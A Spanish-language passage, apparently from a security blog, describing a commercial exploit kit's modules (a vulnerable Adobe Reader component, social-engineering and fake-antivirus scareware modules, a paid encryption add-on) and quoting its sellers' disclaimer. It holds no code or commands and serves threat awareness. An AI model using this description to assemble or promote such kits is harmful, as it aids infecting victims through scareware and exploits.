  • Módulo que proporciona una versión vulnerable de Adobe Acrobat Reader.
  • Módulo "mod_vparivatel" diseñado para explotar el factor humano a través de Ingeniería Social intentando que el usuario descargue el código malicioso.
  • Módulo "vparivate" que intenta infectar los equipos de potenciales víctimas a través de Ingeniería Social desplegando la descarga de un falso antivirus (scareware).
  • Módulo de cifrado. Opcional por U$S 50.
Según los creadores del paquete "Al adquirir este producto, Usted es el único responsable de su uso, así como de las consecuencias que pueden ocurrir como resultado de la utilización del producto con malos propósitos o con mala intención, o como resultado de violaciones de las normas de su funcionamiento. El autor no permite el despliegue de scripts en los espacios públicos de Internet, limitando su uso ambientes propios, máquinas virtuales, y dentro del laboratorio de pruebas de red. ¡ADVERTENCIA! El uso de este producto de software con el fin de llevar a malicioso la responsabilidad penal en virtud de los artículos del Código Penal!"

Este tipo de aplicaciones proporciona una base sólida para el ataque a través de malware ya que cada uno de los exploits, módulos y scripts que lo componen, estan intencionalmente creados para permitir la ejecución de código binario y de manera arbitraria en los equipos víctimas.


Información relacionada
Creación Online de malware polimórfico basado en PoisonIvy


# pistus

Ver más